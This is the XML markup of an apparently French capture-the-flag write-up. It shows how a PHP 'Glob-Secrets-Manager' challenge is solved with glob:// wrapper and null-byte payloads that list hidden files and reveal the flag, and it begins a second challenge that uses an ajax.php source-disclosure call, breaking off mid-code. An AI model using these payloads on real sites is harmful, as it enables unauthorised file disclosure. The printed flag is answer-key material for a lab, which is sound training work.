        <w:t>::__construct(../secret): failed to open dir: No such file or directory' in /var/www/html/ESE WEB XX - Glob-Secrets-Manager/index.php:21 Stack trace: #0 /var/www/html/ESE WEB XX - Glob-Secrets-Manager/index.php(21): DirectoryIterator-&gt;__construct('../secret') #1 {main} thrown in /var/www/html/ESE WEB XX - Glob-Secrets-Manager/index.php on line 21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On cherche sur Google les éléments suivants “DirectoryIterator/Glob/PHP” et on arrive sur une page de la documentation PHP nous expliquant les wrappers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>data:// — Données (RFC 2397)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>phar:// — Archive PHP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">glob:// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>— Trouve des noms de fichiers correspondant à un masque donné</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le wrapper glob paraît très intéressant, l’exemple ci-dessous provient de la doc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$it = new DirectoryIterator("glob://ext/spl/examples/*.php");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On applique le wrapper dans notre url pour lister tous les fichiers de secret.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>http://localhost/ESE WEB XX - Glob-Secrets-Manager/index.php?url=glob://secret/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Aucune erreur n’est affichée, nous sommes sur la bonne voie, on essaie ensuite de remonter l'arborescence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>http://localhost/ESE%20WEB%20XX%20-%20Glob-Secrets-Manager/index.php?url=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>glob://*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Erreur : Sorry, you must stay in the secret directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le code source nous renvoie : “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;p&gt;Sorry, you must stay in the secret directory &lt;!-- or not ?--&gt;&lt;/p&gt;&lt;/body&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>”. Apparemment, il est possible de remonter mais il nous faut trouver un bypass. Essayons de remonter en faisant croire au serveur que nous sommes dans secret à l'aide d'un null byte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>http://localhost/ESE WEB XX - Glob-Secrets-Manager/index.php?url=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>glob://*%00secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Ca fonctionne, on obtient tous les fichiers mais rien de concluant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">On se souvient du contenu du fichier secret 1 : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confidential Secret are hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>. On ré-essaie donc mais en affichant les fichiers cachés comme un ls -a.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>http://localhost/ESE WEB XX - Glob-Secrets-Manager/index.php?url=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>glob://.*%00secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.ese{f1lter_4ll_th3_th1ngs}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc287671175"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>WEB 250 - My personnal website</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251744256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>268605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3035300" cy="1725295"/>
            <wp:effectExtent l="0" t="0" r="12700" b="8255"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="28" name="Picture 28" descr="c&amp;c-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c&amp;c-1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3035300" cy="1725295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>On se trouve devant un site simple avec aucun champs de connexion ni aucun système dynamique à première vue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Premier réflexe: regarder les appels fait lors du chargement de la page:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5019040" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="1016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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5019040" cy="628650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On remarque un appel fait à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ajax.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec passé en paramètre une chaine de caractères </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>contact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. Cet appel nous affiche le code source le page demandée, ici contact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Regardons le code javacript qui réalise cet appel:</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function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>load_page(</w:t>
            </w:r>
            <w:r>
              <w:t>page</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>ajax</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800000"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"ajax.php?load="</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>page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800000"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"GET"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800000"/>
              </w:rPr>
              <w:t>success</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>html</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window</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>document</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>getElementById</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'contact'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:r>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>html</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load_page</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'contact'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>//load_page('admin');</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’est une requête ajax qui charge le contenu de la page passée en paramètre de la fonction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>load_page(page)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On notera qu’il y a un appel sur une page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Avec ajax.php récupérons la source de la page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dans la page index.php, la page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>common.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> est appelée, on récupérera la source plus tard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La source de la page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pP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00"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
            <w:r>
              <w:t>php</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require</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'functions.php'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>//admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>page</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0000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_SESSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'auth'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$_SESSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'auth'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"true"</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0000"/>
              </w:rPr>
              <w:t>get_flag();</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808000"/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
